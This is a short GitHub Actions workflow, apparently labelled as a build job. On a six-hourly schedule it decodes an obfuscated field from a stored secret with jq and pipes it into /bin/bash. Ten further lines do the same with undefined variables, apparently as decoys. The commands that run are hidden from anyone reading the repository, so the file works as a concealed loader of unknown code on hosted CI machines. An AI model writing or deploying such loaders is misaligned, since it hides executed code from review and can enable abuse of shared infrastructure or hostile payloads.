name: weishenmeda
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weishenmeda
        env:
          lzz1: ${{ secrets.lzz1 }}
        run: |
          echo $lzz1 | jq -r .c73603 | /bin/bash
          echo $gjmck7 | jq -r .xve5 | /bin/bash
          echo $fuomo7645 | jq -r .pkpvr56102 | /bin/bash
          echo $aij8 | jq -r .xoum347 | /bin/bash
          echo $n4 | jq -r .qxa333 | /bin/bash
          echo $cl933 | jq -r .d2 | /bin/bash
          echo $of33262 | jq -r .a55 | /bin/bash
          echo $qd96 | jq -r .ldvog34081 | /bin/bash
          echo $teeu42 | jq -r .m6 | /bin/bash
          echo $kpv1966 | jq -r .pq07826 | /bin/bash
          echo $axb1 | jq -r .pmod035 | /bin/bash

